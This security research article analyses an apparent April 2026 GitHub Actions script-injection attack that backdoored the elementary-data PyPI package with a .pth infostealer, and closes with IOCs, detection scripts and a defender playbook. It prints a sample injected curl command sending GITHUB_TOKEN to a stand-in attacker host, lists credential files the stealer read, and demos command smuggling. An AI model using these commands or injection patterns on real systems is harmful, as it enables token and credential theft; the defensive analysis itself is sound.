The Comment That Poisoned a Million Pipelines: elementary-data's GitHub Actions Script Injection and the Rise of CI-Native Supply Chain Attacks

By Lyrie.ai Cyber Research Division·5/5/2026

TL;DR

On April 25, 2026, an attacker compromised elementary-data v0.23.3 — a Python package with over 1.1 million monthly downloads — without ever stealing a maintainer's credentials or bypassing MFA. Instead, they posted a crafted comment on a GitHub pull request, exploited a script injection flaw in the project's CI workflow, and walked away with a short-lived GITHUB_TOKEN with write scope. That token was enough to forge a signed release tag, trigger the project's own publish pipeline, and ship a backdoored package to PyPI and the GitHub Container Registry — all while everything looked like a normal, legitimate release. The payload: a Python .pth infostealer that executes silently on every interpreter startup, harvesting cloud credentials, SSH keys, Kubernetes secrets, CI tokens, developer .env files, and cryptocurrency wallet files from every machine that installed it. The attack illuminates a structural crisis: GitHub Actions is not just CI infrastructure anymore — it is the attack surface.

Background

elementary-data is an open-source data observability platform built around dbt (Data Build Tool). Data engineers use it to monitor pipeline health, catch schema drift, flag data quality anomalies, and maintain observability across large warehouses (Snowflake, BigQuery, Redshift). Because it sits at the nexus of cloud credentials, database access, and orchestration secrets, it is exactly the kind of tool a well-targeted attacker would choose. A single compromised install in a production data-engineering environment means access to the entire data infrastructure it touches.

The package pulls over 1.1 million downloads monthly on PyPI. It is used by hundreds of data-forward startups, analytics agencies, and enterprise data teams. Those teams typically run it inside automated pipelines — on CI/CD runners, in Docker containers, in scheduled orchestrator jobs — meaning the malicious .pth file would be silently executing across production-adjacent infrastructure without any human interaction after install.

The attack played out on a weekend, a deliberate operational choice. Threat actors routinely launch supply chain attacks on Fridays and Saturdays, when maintainer response times stretch to 12–48 hours. In this case, the malicious package was live for roughly six hours before a community member, crisperik, spotted the anomaly and opened a GitHub issue, and a patched release followed roughly six hours after that. From first injection to public disclosure, about 18 hours elapsed.

Technical Analysis

The Vulnerability: `issue_comment` + Unsanitised Shell Interpolation

The attack exploits a class of vulnerability that StepSecurity researchers call GitHub Actions script injection: a workflow triggered by a comment event (issue_comment or pull_request_review_comment) reads user-controlled input, here the body of a pull request comment, and interpolates it directly into a run: shell block using ${{ github.event.comment.body }} (or an equivalent expression).

The critical property is that ${{ ... }} expressions are substituted before the shell ever sees the script. The value is not handed over as a shell variable (as it would be if it arrived through the environment and were referenced as $VAR); it is pasted as a string directly into the script source. An attacker who controls the content of a PR comment therefore controls an arbitrary string that is inlined into a bash script running in the context of the base repository, with full access to the workflow's environment variables, including the GITHUB_TOKEN.

The payload posted by the attacker was a carefully crafted comment body. When the workflow triggered and processed it, the injected shell fragment extracted the runner's ephemeral token:

# Injected payload (simplified representation)
$(curl -H "Authorization: token $GITHUB_TOKEN" \
       -d '{"ref":"main"}' \
       https://attacker-c2.example.com/collect)

The GITHUB_TOKEN is short-lived (scoped to the run), but in this case the token had write permissions to the repository: enough to push commits, force-push tags, and trigger further workflows.
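
The difference between expression substitution and environment-variable passing can be reproduced locally. The sketch below is an illustration only: the step text, the harmless payload, and the helper names (render_expression, run_step) are assumptions made for the demo, not the project's actual workflow or the attacker's real comment. It mimics what the runner does by pasting the comment body into the script text, then runs the same step with the body supplied through the environment instead.

```python
import os
import subprocess

# Hypothetical step bodies, modelled on the pattern described above.
UNSAFE_STEP = 'echo "Comment: ${{ github.event.comment.body }}"'
SAFE_STEP = 'echo "Comment: $COMMENT_BODY"'

# Harmless stand-in for an attacker-controlled comment body.
PAYLOAD = 'hi"; echo INJECTED; echo "'


def render_expression(step, comment_body):
    """Mimic the runner: paste the value into the script source as plain text."""
    return step.replace("${{ github.event.comment.body }}", comment_body)


def run_step(script, extra_env=None):
    """Run a step body with sh and return its standard output."""
    env = {**os.environ, **(extra_env or {})}
    result = subprocess.run(
        ["sh", "-c", script], env=env, capture_output=True, text=True, check=True
    )
    return result.stdout


if __name__ == "__main__":
    # The payload closes the quoted string and smuggles in a second command.
    print(run_step(render_expression(UNSAFE_STEP, PAYLOAD)))
    # The payload stays inert data inside the variable.
    print(run_step(SAFE_STEP, {"COMMENT_BODY": PAYLOAD}))
```

In the first call the shell parses the pasted text as three commands, so the injected echo runs. In the second call the shell only ever sees $COMMENT_BODY, and the payload is printed verbatim as data.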

Forging the Release

With the harvested token in hand, the attacker used the GitHub API to:

1. Inject a malicious elementary.pth file into the source tree via a direct commit to main.

2. Create and push a new signed git tag: v0.23.3.

The tag creation then triggered the project's legitimate release.yml workflow, the one that builds and publishes to PyPI.

The release pipeline executed exactly as designed: it built the package from source (which now included the attacker's .pth file), signed it with the project's own certificates, and pushed it to PyPI as elementary-data==0.23.3. It also built and pushed a Docker image tagged :0.23.3 and :latest to the GitHub Container Registry (GHCR).

From a supply chain integrity perspective, this is the worst case: the malicious package was not a typosquatted fake. It was a legitimate, signed, certificate-backed release from the real project's own publishing infrastructure. Signature checks would not catch it. Package name checks would not catch it. The only fingerprint was the addition of an unexpected .pth file.

The Payload: `.pth` Files as Silent Persistent Execution

Python's .pth file mechanism is a decades-old feature designed to extend the module search path. Files with the .pth extension placed in a site-packages directory are processed automatically every time the Python interpreter starts — including in virtual environments, in Docker containers, in orchestrator workers, and in any other Python runtime that has the package installed.

Critically, a .pth file does not need to be imported by anything. Any line in it that begins with import is executed by Python's site module as the interpreter starts, so there is no import guard, no explicit invocation, and no user interaction involved. The infostealer activates silently at interpreter startup. In a data pipeline environment where Python workers are started and restarted continuously, every process launch is a credential extraction event.
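
The mechanism is easy to observe with a harmless file. The following is a minimal sketch, not the actual payload: it writes a throwaway demo.pth (a hypothetical name) into a temporary directory and asks the standard library's site.addsitedir to process that directory the same way site-packages is processed at startup. The environment variable PTH_DEMO_RAN is likewise just a marker invented for the demo.

```python
import os
import site
import sys
import tempfile
from pathlib import Path


def demo_pth_execution():
    """Return True if a line in a .pth file ran as code while being processed."""
    os.environ.pop("PTH_DEMO_RAN", None)
    with tempfile.TemporaryDirectory() as tmp:
        pth_file = Path(tmp) / "demo.pth"
        # A .pth line starting with "import" is executed, not treated as a path.
        pth_file.write_text(
            'import os; os.environ["PTH_DEMO_RAN"] = "1"\n', encoding="utf-8"
        )
        # Same processing the interpreter applies to site-packages at startup.
        site.addsitedir(tmp)
        # Best-effort cleanup of the sys.path entry added for the demo.
        sys.path[:] = [p for p in sys.path if p != tmp]
    return os.environ.get("PTH_DEMO_RAN") == "1"


if __name__ == "__main__":
    print("code in .pth executed:", demo_pth_execution())
```

Nothing in the script imports a module from the temporary directory; processing the directory is enough to run the line.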

The elementary.pth payload targeted:

| Category | Targets |
|---|---|
| Cloud Credentials | ~/.aws/credentials, GCP application_default_credentials.json, Azure CLI tokens |
| SSH | ~/.ssh/id_*, ~/.ssh/known_hosts, authorized_keys |
| Kubernetes | ~/.kube/config, in-cluster service account tokens |
| CI/CD Secrets | GITHUB_TOKEN, NPM_TOKEN, PYPI_TOKEN, TWILIO_* and STRIPE_* env vars |
| Developer Tokens | .env files, shell history, ~/.netrc |
| Container | Docker Hub credentials, container registry auth |
| Crypto Wallets | Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Monero (XMR), Ripple wallet files |
| System Recon | /etc/passwd, ~/.bash_history, ~/.zsh_history, /proc/self/environ |

The payload was designed for the exact environment elementary-data lives in: a machine that has cloud provider CLIs installed, Kubernetes contexts configured, multiple .env files from data pipeline configurations, and likely an NPM_TOKEN or PYPI_TOKEN for the team's own package publishing. One install — access to the entire stack.

The GHCR Extension

Because the release pipeline included a build-and-push-docker-image job, the malicious .pth file also landed in the official Docker image published to ghcr.io/elementary-data/elementary:0.23.3 and, critically, :latest. Organisations running elementary-data in containerised environments that tracked :latest (a common pattern) automatically pulled and deployed the backdoored image. Container-based deployments often run with broader environment variable access than local installs, so the payload could read orchestration-level secrets injected as container environment variables.

Indicators of Compromise (IOCs)

| Type | Value |
|---|---|
| Malicious PyPI package | elementary-data==0.23.3 |
| Malicious Docker image | ghcr.io/elementary-data/elementary:0.23.3 |
| Malicious Docker image | ghcr.io/elementary-data/elementary:latest (as of April 25–26, 2026 window) |
| Malicious file | elementary.pth in site-packages/ |
| Malicious git tag | v0.23.3 in elementary-data/elementary repo |
| Attack window | April 25, 2026 15:00 UTC → April 26, 2026 ~08:00 UTC |
| Clean replacement | elementary-data==0.23.4 |

Detection heuristics:

- Presence of elementary.pth in any Python site-packages/ directory.
- Unexpected outbound connections from Python worker processes to non-standard endpoints immediately after interpreter startup.
- GITHUB_TOKEN or cloud credentials showing up in process memory dumps or runner logs for jobs that should not be touching them.
- Docker image digests for elementary not matching post-patch checksums from the project's verified releases.
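
The first heuristic can be checked with a few lines of Python. This is a rough sketch under stated assumptions: check_site_packages is a hypothetical helper, and the pattern assumes the standard wheel layout in which an installed release leaves an elementary_data-0.23.3.dist-info directory behind. Running it with an interpreter outside the affected environment (or with python -S, which skips site processing) avoids triggering any .pth file while looking for one.

```python
import re
from pathlib import Path

# Assumed metadata directory name for the compromised release (standard wheel layout).
BAD_DIST_INFO = re.compile(r"^elementary[-_.]data-0\.23\.3\.dist-info$", re.IGNORECASE)


def check_site_packages(site_packages):
    """Return a list of IOC findings for one site-packages directory."""
    root = Path(site_packages)
    findings = []
    if (root / "elementary.pth").is_file():
        findings.append("elementary.pth present")
    for entry in root.iterdir():
        if entry.is_dir() and BAD_DIST_INFO.match(entry.name):
            findings.append(f"{entry.name} present (compromised version installed)")
    return findings


if __name__ == "__main__":
    import sys

    # Usage: python -S check_iocs.py /path/to/venv/lib/python3.x/site-packages
    for directory in sys.argv[1:]:
        for finding in check_site_packages(directory):
            print(f"{directory}: {finding}")
```

An empty result only means these two file-level indicators are absent in that directory; it says nothing about credentials that may already have been exfiltrated.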

The Broader Pattern: GitHub Actions as the Primary Supply Chain Attack Surface

This attack is not an isolated incident. It is part of a structural pattern that has been building since 2024:

- November 2024, SpotBugs: pull_request_target trigger + untrusted fork checkout leaked a maintainer PAT.
- December 2024, Ultralytics: Same trigger family, cache poisoning second stage, crypto miner shipped to PyPI.
- March 2025, tj-actions/changed-files (CVE-2025-30066): The PAT harvested from SpotBugs was used months later to push a malicious commit into the dependency chain of an Action used by roughly 23,000 repositories. CISA advisory issued.
- August 2025, nx packages: Malicious GitHub Actions workflow injected AI coding assistant credential harvester.
- April 2026, elementary-data: Script injection via PR comment, full release pipeline hijack, 1.1M-download package backdoored.
- April–May 2026, Mini Shai-Hulud (TeamPCP): GitHub Actions and npm tokens harvested from compromised machines used to self-propagate through developer release workflows, poisoning SAP npm packages and PyTorch Lightning.

Every one of these exploits GitHub Actions operating as documented. The pull_request_target trigger was designed for cross-fork workflows. Expression interpolation into run: blocks is how you pass PR metadata to shell scripts. GITHUB_TOKEN write permissions are the default for many workflows. The attack surface is not a collection of bugs — it is a collection of features assembled in ways their designers did not anticipate at scale.

ReversingLabs data puts malicious open-source package growth at 73% in 2026. GitHub Actions is the common thread running through the majority of the most impactful cases.

Lyrie Take

The elementary-data incident represents the maturation of what we at Lyrie call CI-native supply chain exploitation: attacks that do not compromise credentials, do not phish maintainers, and do not plant typosquatted packages. They compromise the build infrastructure itself, and then let the legitimate release pipeline do the work.

This is categorically harder to detect than traditional supply chain attacks because:

1. The package is signed by the real maintainer's infrastructure. Certificate validation passes. PyPI's signing checks pass. The package looks exactly like every other legitimate release.

2. The attack vector leaves minimal persistent evidence in the repository. The malicious .pth file was added in a single commit via API. Once the tag was cut and the release pipeline fired, the commit could theoretically have been cleaned from the tree — though in this case it was not.

3. The payload executes without import. Traditional static analysis of Python packages looks for suspicious imports, network calls, and subprocess executions in package __init__.py or setup.py hooks. A .pth file with a one-line exec() call is invisible to most scanners that don't specifically enumerate .pth file content.
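
Enumerating .pth content is not hard once a scanner knows to look. The sketch below is one possible approach, not a description of any particular product: find_executable_pth_lines is a hypothetical helper that walks the interpreter's site-packages directories (or a list passed in) and reports every .pth line that Python would execute rather than treat as a path. Legitimate packages also ship such lines (setuptools' distutils-precedence.pth is one example), so hits are leads for review, not verdicts.

```python
import site
from pathlib import Path


def find_executable_pth_lines(directories=None):
    """Return (path, line number, line) for each .pth line Python would execute."""
    if directories is None:
        directories = site.getsitepackages() + [site.getusersitepackages()]
    hits = []
    for directory in directories:
        root = Path(directory)
        if not root.is_dir():
            continue
        for pth_file in sorted(root.glob("*.pth")):
            text = pth_file.read_text(encoding="utf-8", errors="replace")
            for lineno, line in enumerate(text.splitlines(), start=1):
                # The site module executes lines that start with "import"
                # followed by a space or a tab; other lines are path entries.
                if line.startswith(("import ", "import\t")):
                    hits.append((str(pth_file), lineno, line.strip()))
    return hits


if __name__ == "__main__":
    for path, lineno, line in find_executable_pth_lines():
        print(f"{path}:{lineno}: {line[:120]}")
```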

For organisations in the data engineering space — anyone running dbt, Airflow, Prefect, Dagster, or similar — this attack is a template for future campaigns. The data pipeline tooling ecosystem is full of widely-trusted packages with CI/CD workflows that haven't been audited for script injection since they were written. Many of them have direct access to production warehouse credentials.

The fix for elementary-data was a patched release, shipped roughly six hours after discovery. Uninstalling the package does not remediate a compromise, because any credentials the payload could reach must be assumed stolen. Credential rotation is required for any machine that installed v0.23.3. For teams running the :latest Docker tag, the exposure window may be longer and harder to bound.

Defender Playbook

Immediate (If You Installed `elementary-data==0.23.3`)

1. Rotate all credentials on affected machines immediately — cloud provider IAM keys, Kubernetes service account tokens, Docker Hub credentials, CI/CD tokens, any .env file values that were accessible to the Python runtime.

2. Audit shell history and process logs for unexpected network connections from Python processes.

3. Purge the pip cache (~/.cache/pip), rebuild affected virtual environments or site-packages/ directories so that no elementary.pth remains, and install 0.23.4.

4. Pull new Docker images and verify digests against post-patch checksums.

5. Check GHCR image history for any deployments that pulled :latest in the April 25–26 window.

For Open-Source Maintainers

6. Audit all pull_request_target and issue_comment-triggered workflows for direct interpolation of ${{ github.event.*.body }} into run: blocks. Pass the value through an environment variable and reference it as a shell variable instead:

   env:
     COMMENT_BODY: ${{ github.event.comment.body }}
   run: echo "$COMMENT_BODY"  # Not: echo "${{ github.event.comment.body }}"

7. Scope GITHUB_TOKEN to minimum required permissions. Use permissions: blocks in workflow files; default to read-only and escalate only where needed.

8. Require tag protection rules. Prevent arbitrary tag creation without a PR review or branch protection equivalent.

9. Pin third-party Actions to full commit SHAs, not mutable tags (uses: actions/checkout@v4 → uses: actions/checkout@<full-sha>).

10. Use StepSecurity Harden-Runner or equivalent to detect unexpected network egress from CI runners.
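
The audit in step 6 can be partly automated. What follows is a rough heuristic sketch, not a YAML parser and not a replacement for purpose-built workflow linters: find_risky_interpolations is a hypothetical helper that tracks run: blocks by indentation and reports any ${{ github.event.* }} expression found inside one. It will flag benign fields too (an event number, for instance), so treat the output as a review list.

```python
import re

# Matches "run:" as a step key, optionally preceded by a list dash.
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
# Any expression that references the event payload.
EVENT_EXPR = re.compile(r"\$\{\{[^}]*\bgithub\.event\.[^}]*\}\}")


def find_risky_interpolations(workflow_text):
    """Return (line number, expression) pairs found inside run: blocks."""
    findings = []
    run_indent = None  # column of the active run: key, or None outside a block
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.strip()
        indent = len(line) - len(line.lstrip())
        # A non-blank line indented no deeper than the run: key ends the block.
        if run_indent is not None and stripped and indent <= run_indent:
            run_indent = None
        match = RUN_KEY.match(line)
        if match:
            run_indent = len(match.group(1))
            script = match.group(2)
            # In an unquoted one-line value, YAML treats " #" as a comment start.
            if not script.startswith(("|", ">", '"', "'")):
                script = script.split(" #", 1)[0]
        elif run_indent is not None:
            script = line
        else:
            continue
        for expression in EVENT_EXPR.findall(script):
            findings.append((lineno, expression))
    return findings


if __name__ == "__main__":
    import sys

    for workflow_path in sys.argv[1:]:
        with open(workflow_path, encoding="utf-8") as handle:
            for lineno, expression in find_risky_interpolations(handle.read()):
                print(f"{workflow_path}:{lineno}: {expression}")
```

Expressions that appear under env: are deliberately ignored, since that is the safe pattern: the value reaches the shell as data rather than as script text.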

For Enterprise / Platform Security Teams

11. Implement package version pinning in requirements.txt and lock files for all production dependencies. Systems without pinned versions pulled the backdoored build automatically.

12. Deploy SCA tooling that specifically enumerates .pth files in installed packages as a detection heuristic.

13. Block consumption of :latest image tags (from ghcr.io or any other registry) in production Kubernetes clusters; require pinning to a specific digest.

14. Monitor outbound connections from data pipeline orchestrators for anomalous patterns at process startup.

15. Establish a credential rotation runbook for supply chain incidents. Affected organisations without a pre-existing playbook lost hours to manual coordination.
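
Steps 11 and 13 lend themselves to simple pre-deployment checks. The sketch below is illustrative only and deliberately conservative: is_digest_pinned and unpinned_requirements are hypothetical helpers, the requirement pattern covers plain name==version lines rather than the full requirements file grammar, and everything after a # is treated as a comment.

```python
import re

# An image reference counts as pinned only if it ends in a sha256 digest.
DIGEST_REF = re.compile(r"^[^\s@]+@sha256:[0-9a-f]{64}$")
# A requirement counts as pinned only if it uses an exact "==" version.
PINNED_REQ = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[^\]]*\])?\s*==\s*[0-9][^\s;*]*")


def is_digest_pinned(image_ref):
    """Return True for references such as registry/name@sha256:<64 hex chars>."""
    return bool(DIGEST_REF.match(image_ref))


def unpinned_requirements(lines):
    """Return requirement lines that do not pin an exact version."""
    loose = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        # Skip blanks, comments, and option lines such as "-r base.txt".
        if not line or line.startswith("-"):
            continue
        if not PINNED_REQ.match(line):
            loose.append(line)
    return loose


if __name__ == "__main__":
    print(is_digest_pinned("ghcr.io/elementary-data/elementary:latest"))
    print(unpinned_requirements(["elementary-data==0.23.4", "dbt-core>=1.7"]))
```

An exact version pin would not have helped a team that had already pinned 0.23.3, so checks like these complement, rather than replace, the detection and rotation steps above.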

Sources

1. StepSecurity — "elementary-data Compromised on PyPI and GHCR: Forged Release Pushed via GitHub Actions Script Injection" — stepsecurity.io, April 27, 2026

2. BleepingComputer — "PyPI package with 1.1M monthly downloads hacked to push infostealer" — bleepingcomputer.com, May 1, 2026

3. The CyberSec Guru — "Elementary-Data PyPI Hack: 1.1M Users Targeted by Infostealer" — thecybersecguru.com, April 30, 2026

4. Reddit r/cybersecurity — "Supply Chain Attack: GitHub Actions compromise led to malicious PyPI release of elementary-data" — April 28, 2026

5. Andrew Nesbitt — "GitHub Actions is the weakest link" — nesbitt.io, April 28, 2026

6. Wiz Blog — "Supply Chain Campaign Targets SAP npm Packages" (Mini Shai-Hulud context) — wiz.io, April 29, 2026

7. Security Boulevard — "1,800 Developers Hit in Mini Shai-Hulud Supply Chain Attack Across PyPI, NPM, and PHP" — May 3, 2026

8. ReversingLabs — Open-source malicious package growth statistics 2026

Lyrie.ai Cyber Research Division — Senior Analyst Desk
